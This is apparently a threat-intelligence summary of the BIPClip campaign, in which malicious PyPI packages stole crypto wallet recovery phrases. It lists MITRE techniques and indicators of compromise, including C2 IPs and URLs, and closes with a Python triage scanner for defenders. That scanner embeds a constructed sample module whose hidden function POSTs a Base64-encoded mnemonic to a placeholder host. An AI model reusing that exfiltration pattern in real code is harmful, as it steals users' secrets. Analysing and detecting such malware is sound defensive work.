BIPClip: Malicious PyPI packages target crypto wallet recovery passwords

ReversingLabs uncovered the BIPClip campaign: a set of malicious PyPI packages that used name-squatting and a malicious dependency to capture and exfiltrate BIP39 mnemonic passphrases. The operation staged data exfiltration via Base64-obfuscated URLs and HTTP POSTs to a remote C2, leveraging GitHub-hosted configuration to rotate C2 addresses. #BIPClip #bip39_mnemonic_decrypt

Keypoints

  • Seven malicious PyPI packages (19 versions) were identified that collectively targeted BIP39 mnemonic recovery phrases by hiding malicious code in dependencies.
  • Primary lure packages (e.g., mnemonic_to_address, public-address-generator) implemented legitimate BIP39/crypto functionality while importing a malicious dependency that exfiltrated secrets.
  • The malicious module (bip39_mnemonic_decrypt / erc20-scanner / hashdecrypts) contained a decrypt_jsBIP39 function that Base64-encoded mnemonics and POSTed them to a remote C2 in a “license” field.
  • Some packages fetched the real C2 address from a Base64-encoded URL stored on a GitHub raw file (HashSnake/backendapi/settings), enabling remote reconfiguration of the server address.
  • Attackers used throwaway PyPI accounts and naming that mimicked legitimate crypto libraries to evade cursory audits and rely on victims not vetting dependencies deeply.
  • Most packages were removed quickly after detection, but one earlier package (hashdecrypt) dated to Dec 2022 and had thousands of downloads, increasing potential impact.

MITRE Techniques

  • [T1195.002] Compromise Software Dependencies and Development Tools – Malicious code was delivered via a dependent package rather than the primary lure package, forcing targets to trust dependencies (‘the second package, bip39_mnemonic_decrypt, serving as a “clean” package with the malicious bip39_mnemonic_decrypt listed as a dependency’).
  • [T1195] Supply Chain Compromise – The campaign abused PyPI package distribution to insert malicious functionality into developer workflows (‘distributed through seven newly discovered malicious PyPI packages’).
  • [T1027] Obfuscated Files or Information – Base64 encoding was used to hide the C2 URL and to encode mnemonics before transmission (‘First, it decodes the Base64 encoded URL of the data exfiltration server.’).
  • [T1036] Masquerading – Package and function names were crafted to mimic legitimate cryptographic libraries and functions to avoid suspicion (‘the name of the imported module and invoked function are carefully chosen to mimic legitimate functions and not raise suspicion’).
  • [T1071.001] Application Layer Protocol: Web Protocols – An HTTP POST was used to send encoded mnemonic data to the C2 server (‘sends it to the exfiltration server using a HTTP POST request’).
  • [T1041] Exfiltration Over C2 Channel – Sensitive mnemonic phrases were exfiltrated over the network to a remote command-and-control server (‘encodes the provided mnemonic passphrase using Base64 and then sends it to the exfiltration server using a HTTP POST request’).

Indicators of Compromise

  • [PyPI package names] Malicious packages used as lures and dependencies – bip39-mnemonic-decrypt, mnemonic_to_address (also public-address-generator, erc20-scanner, hashdecrypt, hashdecrypts).
  • [File hashes] Signed package file SHA1s for identification – e.g., 45130c7a2d92282ee9c0b066206f235198b5ddfb (bip39-mnemonic-decrypt 1.0.0), 01b66f12e9f76342729c1260ff4f0da8fc1bbe01 (hashdecrypt 1.0.0), and 40+ other hashes listed in the report.
  • [IP addresses] Known C2 hosts – 5.42.92.191, 194.163.154.242 (used as command-and-control infrastructure).
  • [Domains / URLs] C2 and configuration endpoints – knallos.de, hxxps://raw.githubusercontent.com/HashSnake/backendapi/main/settings (used to retrieve the real C2 address), and hxxps://github.com/HashSnake/hCrypto (malicious GitHub repo).

Rewritten technical summary:

The campaign used a two-stage package design: a benign-looking primary package (e.g., mnemonic_to_address or public-address-generator) implementing advertised BIP39/crypto functions, and a malicious dependent package (bip39_mnemonic_decrypt, erc20-scanner, hashdecrypt(s)) that contained hidden exfiltration logic. The primary package calls a function (decrypt_jsBIP39) that is not part of legitimate libraries but is imported from the malicious dependency, passing the user-supplied mnemonic to it.

Within the malicious dependency the decrypt_jsBIP39 function is concealed at the end of __init__.py and first decodes a Base64-encoded URL to locate the exfiltration endpoint. It Base64-encodes the received mnemonic, inserts it into a data field labeled “license”, and issues an HTTP POST to a C2 server (web protocol) so the payload blends with expected application-layer traffic. Some variants first perform an HTTP GET to a Base64-encoded GitHub raw URL (HashSnake/backendapi/settings) to retrieve the current C2 address, enabling remote reconfiguration of the server without republishing packages.

The attackers used throwaway PyPI accounts and carefully chosen package and function names that resemble legitimate crypto tooling, relying on incomplete dependency audits to evade detection. Defenders should flag cryptographic utility packages that import networking libraries, inspect dependencies for unexpected network calls or Base64-decoded URLs, block the known C2 hosts (the IPs and domains listed above), and verify package file hashes against published IoC lists.
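The checks recommended above can be automated with a small static triage pass over a package's source. The script below is an added example written for this summary, not ReversingLabs' tooling and not code from the BIPClip packages: it walks a module's AST and reports the traits the report associates with the malicious dependency (networking imports inside a "crypto utility", Base64 string literals that decode to URLs, outbound HTTP calls, references to the IoC hosts quoted above), and matches a downloaded file's SHA1 against the two hashes listed on this page. The sample module it scans is constructed to mirror the described pattern; its encoded URL decodes to the placeholder `https://c2.example.invalid/api`, not a real C2.

```python
"""Static triage for the BIPClip dependency pattern (added example, not the report's tooling)."""
import ast
import base64
import hashlib
import re
from typing import List, Optional, Tuple

# IoCs as quoted in the summary above; the full report lists many more hashes.
IOC_SHA1 = {
    "45130c7a2d92282ee9c0b066206f235198b5ddfb": "bip39-mnemonic-decrypt 1.0.0",
    "01b66f12e9f76342729c1260ff4f0da8fc1bbe01": "hashdecrypt 1.0.0",
}
IOC_HOSTS = ("5.42.92.191", "194.163.154.242", "knallos.de",
             "raw.githubusercontent.com/HashSnake")

NETWORK_MODULES = {"requests", "urllib", "urllib3", "http", "socket", "httpx", "aiohttp"}
HTTP_FUNCS = {"post", "get", "request", "urlopen", "Session", "Request"}
URL_RE = re.compile(r"^https?://", re.IGNORECASE)

Finding = Tuple[str, str, int]  # (kind, detail, line number in the scanned module)


def _decode_b64(text: str) -> Optional[str]:
    """Strictly decode a Base64 literal to UTF-8 text; None if it is not one."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def _dotted(node: ast.AST) -> Optional[str]:
    """Render an `a.b.c` call target as a dotted string; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Triage(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: List[Finding] = []
        self.net_names = set()  # names bound by `from requests import post` and the like

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            if alias.name.split(".")[0] in NETWORK_MODULES:
                self.findings.append(("network_import", alias.name, node.lineno))
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module and node.module.split(".")[0] in NETWORK_MODULES:
            self.findings.append(("network_import", node.module, node.lineno))
            self.net_names.update(a.asname or a.name for a in node.names)
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted(node.func)
        if name:
            root, leaf = name.split(".")[0], name.split(".")[-1]
            if (root in NETWORK_MODULES and leaf in HTTP_FUNCS) or root in self.net_names:
                self.findings.append(("network_call", name, node.lineno))
        self.generic_visit(node)

    def visit_Constant(self, node: ast.Constant) -> None:
        if isinstance(node.value, str):
            self._check_text(node.value, node.lineno, decoded=False)
            if len(node.value) >= 16:  # short literals are rarely encoded URLs
                plain = _decode_b64(node.value)
                if plain is not None:
                    self._check_text(plain, node.lineno, decoded=True)

    def _check_text(self, text: str, lineno: int, decoded: bool) -> None:
        if decoded and URL_RE.match(text):
            self.findings.append(("b64_url", text, lineno))
        for host in IOC_HOSTS:
            if host in text:
                self.findings.append(("ioc_host", host, lineno))


def scan_source(source: str) -> List[Finding]:
    """Scan one module's source text; a clean module yields an empty list."""
    visitor = _Triage()
    visitor.visit(ast.parse(source))
    return visitor.findings


def check_sha1(blob: bytes) -> Optional[str]:
    """Match a downloaded package file against the SHA1 IoCs; None if no match."""
    return IOC_SHA1.get(hashlib.sha1(blob).hexdigest())


# Constructed stand-in for the hidden function the report describes. The Base64
# literal decodes to the placeholder "https://c2.example.invalid/api" (not a real C2).
_ENC_URL = base64.b64encode(b"https://c2.example.invalid/api").decode()
SAMPLE_MODULE = '''
import base64
import requests
from mnemonic import Mnemonic   # the advertised, legitimate-looking functionality

def to_seed(words):
    return Mnemonic("english").to_seed(words)

def decrypt_jsBIP39(words):     # not part of any real BIP39 library
    url = base64.b64decode("@@ENC@@").decode()
    requests.post(url, data={"license": base64.b64encode(words.encode()).decode()})
'''.replace("@@ENC@@", _ENC_URL)

if __name__ == "__main__":
    for kind, detail, line in scan_source(SAMPLE_MODULE):
        print(f"line {line:>3}  {kind:<15} {detail}")
```

Run against the constructed sample, the scan reports the `requests` import, the Base64 literal that decodes to a URL, and the `requests.post` call; a module that only uses `hashlib` produces no findings. In practice you would point `scan_source` at every `.py` file in an unpacked sdist or wheel (including each transitive dependency, since the lure package itself looked clean) and `check_sha1` at the downloaded archive before installation.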

Read more: https://www.reversinglabs.com/blog/bipclip-malicious-pypi-packages-target-crypto-wallet-recovery-passwords